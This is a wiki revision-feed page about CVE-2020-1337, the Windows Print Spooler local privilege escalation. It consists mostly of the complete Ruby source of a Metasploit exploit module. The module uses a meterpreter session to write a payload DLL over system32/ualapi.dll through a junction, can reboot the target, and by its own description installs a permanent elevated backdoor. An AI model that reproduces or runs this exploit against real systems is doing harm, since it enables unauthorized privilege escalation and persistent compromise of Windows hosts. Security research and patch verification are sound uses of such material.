https://pwnwiki.com/index.php?action=history&feed=atom&title=CVE-2020-1337_Microsoft_Spooler_%E6%9C%AC%E5%9C%B0%E6%AC%8A%E9%99%90%E6%8F%90%E5%8D%87%E6%BC%8F%E6%B4%9ECVE-2020-1337 Microsoft Spooler 本地權限提升漏洞 - Revision history2026-04-17T16:04:41ZRevision history for this page on the wikiMediaWiki 1.35.1https://pwnwiki.com/index.php?title=CVE-2020-1337_Microsoft_Spooler_%E6%9C%AC%E5%9C%B0%E6%AC%8A%E9%99%90%E6%8F%90%E5%8D%87%E6%BC%8F%E6%B4%9E&diff=3769&oldid=prevPwnwiki: Created page with "==INFO== This exploit leverages a file write vulnerability in the print spooler service which will restart if stopped. Because the service cannot be stopped long enough to rem..."2021-05-31T04:07:26Z<p>Created page with "==INFO== This exploit leverages a file write vulnerability in the print spooler service which will restart if stopped. Because the service cannot be stopped long enough to rem..."</p>
<p><b>New page</b></p><div>==INFO==<br />
This exploit leverages a file write vulnerability in the print spooler service which will restart if stopped. Because the service cannot be stopped long enough to remove the dll, there is no way to remove the dll once it is loaded by the service. Essentially, on default settings, this module adds a permanent elevated backdoor.<br />
<br />
==EXP==<br />
<pre><br />
##<br />
# This module requires Metasploit: https://metasploit.com/download<br />
# Current source: https://github.com/rapid7/metasploit-framework<br />
##<br />
<br />
require 'msf/core/post/windows/powershell'<br />
<br />
class MetasploitModule < Msf::Exploit::Local<br />
Rank = ExcellentRanking<br />
<br />
include Msf::Post::Common<br />
include Msf::Post::File<br />
include Msf::Post::Windows::Priv<br />
include Msf::Exploit::EXE<br />
include Msf::Post::Windows::Powershell<br />
<br />
prepend Msf::Exploit::Remote::AutoCheck<br />
<br />
def initialize(info = {})<br />
super(<br />
update_info(<br />
info,<br />
'Name' => 'Microsoft Spooler Local Privilege Elevation Vulnerability',<br />
'Description' => %q{<br />
This exploit leverages a file write vulnerability in the print spooler service<br />
which will restart if stopped. Because the service cannot be stopped long<br />
enough to remove the dll, there is no way to remove the dll once<br />
it is loaded by the service. Essentially, on default settings, this module<br />
adds a permanent elevated backdoor.<br />
},<br />
'License' => MSF_LICENSE,<br />
'Author' =><br />
[<br />
'Peleg Hadar', # Original discovery<br />
'Tomer Bar', # Original discovery<br />
'404death', # PoC<br />
'sailay1996', # PoC<br />
'bwatters-r7' # msf module<br />
],<br />
'Platform' => ['win'],<br />
'SessionTypes' => ['meterpreter'],<br />
'Targets' =><br />
[<br />
[ 'Automatic', { 'Arch' => [ ARCH_X86, ARCH_X64 ] } ]<br />
],<br />
'DefaultTarget' => 0,<br />
'DisclosureDate' => '2019-11-04',<br />
'References' =><br />
[<br />
['CVE', '2020-1337'],<br />
['URL', 'https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-1337'],<br />
['URL', 'https://github.com/sailay1996/cve-2020-1337-poc'],<br />
['URL', 'https://voidsec.com/cve-2020-1337-printdemon-is-dead-long-live-printdemon/']<br />
],<br />
'DefaultOptions' =><br />
{<br />
'DisablePayloadHandler' => true<br />
},<br />
'SideEffects' => [ ARTIFACTS_ON_DISK, SCREEN_EFFECTS ]<br />
)<br />
)<br />
<br />
register_options([<br />
OptString.new('JUNCTION_PATH',<br />
[false, 'Path to use as junction (%TEMP%/%RAND% by default).', nil]),<br />
OptString.new('DESTINATION_PATH',<br />
[false, 'Location of file to overwrite (%WINDIR%\system32\ by default).', nil]),<br />
OptString.new('DESTINATION_FILE',<br />
[false, 'Filename to overwrite (ualapi.dll by default).', nil]),<br />
OptString.new('PRINTER_NAME',<br />
[true, 'Printer Name to use (%RAND% by default).', Rex::Text.rand_text_alpha(5..9).to_s]),<br />
OptBool.new('RESTART_TARGET',<br />
[false, 'Restart the target after exploit (you will lose your session until a second reboot).', false])<br />
])<br />
end<br />
<br />
def cve_2020_1337_privileged_filecopy(destination_file, destination_path, junction_path, printer_name, b64_payload)<br />
# Read in Generic Script<br />
script = exploit_data('CVE-2020-1337', 'cve-2020-1337.ps1')<br />
fail_with(Failure::BadConfig, 'No exploit script found') if script.nil?<br />
<br />
# Replace Values in Generic Script<br />
vprint_status('Replacing variables')<br />
junction_filepath = "#{junction_path}\\#{destination_file}"<br />
# The random string appears to be required when using the psh_exec<br />
# It may be due to the way we break apart the script?<br />
# I would not be upset to find the root cause and fix it.<br />
script.gsub!('JUNCTION_FILEPATH', junction_filepath)<br />
script.gsub!('PRINTER_NAME', printer_name)<br />
script.gsub!('JUNCTION_PATH', junction_path)<br />
script.gsub!('DESTINATION_PATH', destination_path)<br />
script.gsub!('B64_PAYLOAD_DLL', b64_payload)<br />
<br />
# Run Exploit Script<br />
print_status("Running Exploit on #{sysinfo['Computer']}")<br />
begin<br />
#client.powershell.execute_string(code: script)<br />
session.powershell.execute_string({code: script})<br />
rescue Rex::TimeoutError => e<br />
elog('Caught timeout. Exploit may be taking longer or it may have failed.', error: e)<br />
print_error('Caught timeout. Exploit may be taking longer or it may have failed.')<br />
end<br />
end<br />
<br />
def exploit<br />
if datastore['DESTINATION_PATH'].nil? || datastore['DESTINATION_PATH'].empty?<br />
win_dir = session.sys.config.getenv('windir')<br />
destination_path = "#{win_dir}\\system32"<br />
else<br />
destination_path = datastore['DESTINATION_PATH']<br />
end<br />
if datastore['DESTINATION_FILE'].nil? || datastore['DESTINATION_FILE'].empty?<br />
destination_file = 'ualapi.dll'<br />
else<br />
destination_file = datastore['DESTINATION_FILE']<br />
end<br />
if datastore['JUNCTION_PATH'].nil? || datastore['JUNCTION_PATH'].empty?<br />
junction_path = "#{session.sys.config.getenv('TEMP')}\\#{Rex::Text.rand_text_alpha(6..15)}"<br />
else<br />
junction_path = datastore['JUNCTION_PATH']<br />
end<br />
client.core.use("powershell") if not client.ext.aliases.include?("powershell")<br />
printer_name = datastore['PRINTER_NAME']<br />
payload_dll = generate_payload_dll<br />
<br />
# Check target<br />
vprint_status('Checking Target')<br />
validate_active_host<br />
validate_payload<br />
<br />
# Run the exploit<br />
output = cve_2020_1337_privileged_filecopy(destination_file, destination_path, junction_path, printer_name, Rex::Text.encode_base64(payload_dll))<br />
sleep(3) # make sure exploit is finished<br />
<br />
# Reboot, if desired<br />
if datastore['RESTART_TARGET']<br />
sleep(10)<br />
vprint_status("Rebooting #{sysinfo['Computer']}")<br />
begin<br />
session.sys.power.reboot<br />
rescue Rex::TimeoutError => e<br />
elog('Caught timeout. Exploit may be taking longer or it may have failed.', error: e)<br />
print_error('Caught timeout. Exploit may be taking longer or it may have failed.')<br />
end<br />
end<br />
end<br />
<br />
def validate_active_host<br />
begin<br />
print_status("Attempting to PrivEsc on #{sysinfo['Computer']} via session ID: #{datastore['SESSION']}")<br />
rescue Rex::Post::Meterpreter::RequestError => e<br />
elog('Could not connect to session', error: e)<br />
raise Msf::Exploit::Failed, 'Could not connect to session'<br />
end<br />
end<br />
<br />
def validate_payload<br />
vprint_status("Target Arch = #{sysinfo['Architecture']}")<br />
vprint_status("Payload Arch = #{payload.arch.first}")<br />
unless payload.arch.first == sysinfo['Architecture']<br />
fail_with(Failure::BadConfig, 'Payload arch must match target arch')<br />
end<br />
end<br />
<br />
def check<br />
sysinfo_value = sysinfo['OS']<br />
build_num = sysinfo_value.match(/\w+\d+\w+(\d+)/)[0].to_i<br />
vprint_status("Build Number = #{build_num}")<br />
return Exploit::CheckCode::Appears if sysinfo_value =~ /10/ && build_num <= 18363<br />
return Exploit::CheckCode::Safe<br />
end<br />
end<br />
</pre></div>Pwnwiki